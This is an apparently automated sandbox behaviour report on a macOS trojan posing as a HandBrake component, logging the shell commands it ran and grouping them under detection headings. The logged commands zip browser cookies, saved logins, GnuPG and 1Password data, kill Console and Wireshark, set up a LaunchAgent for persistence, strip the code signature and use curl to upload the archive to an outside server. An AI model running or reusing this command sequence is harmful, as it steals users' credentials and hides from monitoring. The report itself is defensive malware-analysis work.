Source: /bin/sh (PID: 643)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 644)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 646)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 647)Shell process: sed s/^Path=//
Source: /bin/sh (PID: 649)Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 650)Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 652)Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 653)Shell process: sed s/^Path=//
Source: /bin/sh (PID: 654)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/FF.zip /Users/vreni/Library/Application Support/Firefox//cookies.sqlite /Users/vreni/Library/Application Support/Firefox//formhistory.sqlite /Users/vreni/Library/Application Support/Firefox//logins.json /Users/vreni/Library/Application Support/Firefox//logins.json
Source: /bin/sh (PID: 655)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/SF.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/Form Values
Source: /bin/sh (PID: 656)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/OP.zip /Users/vreni/Library/Application Support/com.operasoftware.Opera/Login Data /Users/vreni/Library/Application Support/com.operasoftware.Opera/Cookies /Users/vreni/Library/Application Support/com.operasoftware.Opera/Web Data
Source: /bin/sh (PID: 657)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/GNU_PW.zip /Users/vreni/.gnupg /Users/vreni/Library/Application Support/1Password 4 /Users/vreni/Library/Application Support/1Password 3.9
Source: /bin/sh (PID: 658)Shell process: zip -r /Users/vreni/Library/VideoFrameworks/proton.zip /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 659)Shell process: killall Console
Source: /bin/sh (PID: 660)Shell process: killall Wireshark
Source: /bin/sh (PID: 661)Shell process: rm -rf grace_period
Source: /bin/sh (PID: 663)Shell process: cp -R /Users/vreni/Desktop/unpack/activity_agent.app /Users/vreni/Library/RenderFiles/activity_agent.app
Source: /bin/sh (PID: 664)Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /bin/sh (PID: 665)Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/Info_.plist /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Source: /bin/sh (PID: 666)Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/fr.handbrake.activity_agent.plist /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 669)Shell process: curl -s -F full_name=vreni -F username=vreni -F password= -F root_password=failure -F serial=C07N355HDWYL -F hostname=vreni%E2%80%99s Mac mini -F signed=0 -F file=@/Users/vreni/Library/VideoFrameworks/proton.zip -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init
Source: /bin/sh (PID: 670)Shell process: touch /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /bin/sh (PID: 673)Shell process: sed -i -e s/P_MBN/fr.handbrake.activity_agent/g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 674)Shell process: sed -i -e s=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 675)Shell process: chmod 644 /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 676)Shell process: codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app
Source: /bin/sh (PID: 678)Shell process: rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic*
Source: /bin/sh (PID: 679)Shell process: launchctl load /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 680)Shell process: killall Console
Source: /bin/sh (PID: 681)Shell process: killall Wireshark
Source: /bin/sh (PID: 682)Shell process: rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
Reads local browser cookiesShow sources
Source: /usr/bin/zip (PID: 655)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Source: /usr/bin/zip (PID: 655)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Terminates several processes with shell command 'killall'Show sources
Source: /bin/sh (PID: 659)Killall command executed: killall Console
Source: /bin/sh (PID: 660)Killall command executed: killall Wireshark
Source: /bin/sh (PID: 680)Killall command executed: killall Console
Source: /bin/sh (PID: 681)Killall command executed: killall Wireshark
Writes Mach-O files to unusual directoriesShow sources
Source: /bin/cp (PID: 663)64-bit Mach-O written to unusual path: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677)64-bit Mach-O written to unusual path: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp

Hooking and other Techniques for Hiding and Protection:

barindex
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)Show sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)PTRACE system call (PT_DENY_ATTACH): PID 579 denies future traces
Explicitly terminates console (used for log message viewing) processesShow sources
Source: /bin/sh (PID: 659)Kills 'Console' processes: killall Console
Source: /bin/sh (PID: 680)Kills 'Console' processes: killall Console
Explicitly terminates network capturing processesShow sources
Source: /bin/sh (PID: 660)Kills 'Wireshark' processes: killall Wireshark
Source: /bin/sh (PID: 681)Kills 'Wireshark' processes: killall Wireshark
Moves itself during installation or deletes itself after installationShow sources
Source: /usr/bin/zip (PID: 627)File deleted: /Users/vreni/Library/VideoFrameworks/KC.zip
Source: /usr/bin/zip (PID: 627)File moved: /Users/vreni/Library/VideoFrameworks/zihaRvzn -> /Users/vreni/Library/VideoFrameworks/KC.zip
Source: /usr/bin/zip (PID: 655)File deleted: /Users/vreni/Library/VideoFrameworks/SF.zip
Source: /usr/bin/zip (PID: 655)File moved: /Users/vreni/Library/VideoFrameworks/ziSznLAI -> /Users/vreni/Library/VideoFrameworks/SF.zip
Source: /usr/bin/zip (PID: 658)File deleted: /Users/vreni/Library/VideoFrameworks/proton.zip
Source: /usr/bin/zip (PID: 658)File moved: /Users/vreni/Library/VideoFrameworks/ziHyh3w6 -> /Users/vreni/Library/VideoFrameworks/proton.zip
Source: /bin/mv (PID: 664)File moved: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent -> /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/bin/codesign (PID: 676)File moved: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp -> /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: kern.safeboot (1.66)
Executes the "codesign" command used to create and manipulate code signaturesShow sources
Source: /bin/sh (PID: 676)Codesign executable: /usr/bin/codesign -> codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app

Language, Device and Operating System Detection:

barindex
Reads the system or server version plist fileShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Reads hardware related sysctl valuesShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.availcpu (6.25)
Reads the kernel OS version valueShow sources
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: kern.osversion (1.65)
Reads the systems OS release and/or typeShow sources
Source: /usr/bin/curl (PID: 586)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 597)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 669)Sysctl requested: kern.osrelease (1.2)
Reads the systems hostnameShow sources
Source: /bin/sh (PID: 580)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 584)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 588)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 592)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 594)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 595)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 598)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 599)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 603)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 605)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 610)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 612)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 614)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 616)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 618)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 620)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 622)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 631)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 637)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 643)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 649)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 662)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 667)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 670)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 671)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 672)Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

barindex
May steal keychain information which contains credentialsShow sources
Source: /usr/bin/zip (PID: 627)Keychain directory enumerated: /Users/vreni/Library/Keychains
Source: /usr/bin/zip (PID: 627)Keychain directory enumerated: /Library/Keychains


Runtime Messages

Command:open
Exitcode:0
Killed:False
Standard Output:
Standard Error:

Yara Overview

No Yara matches

Screenshot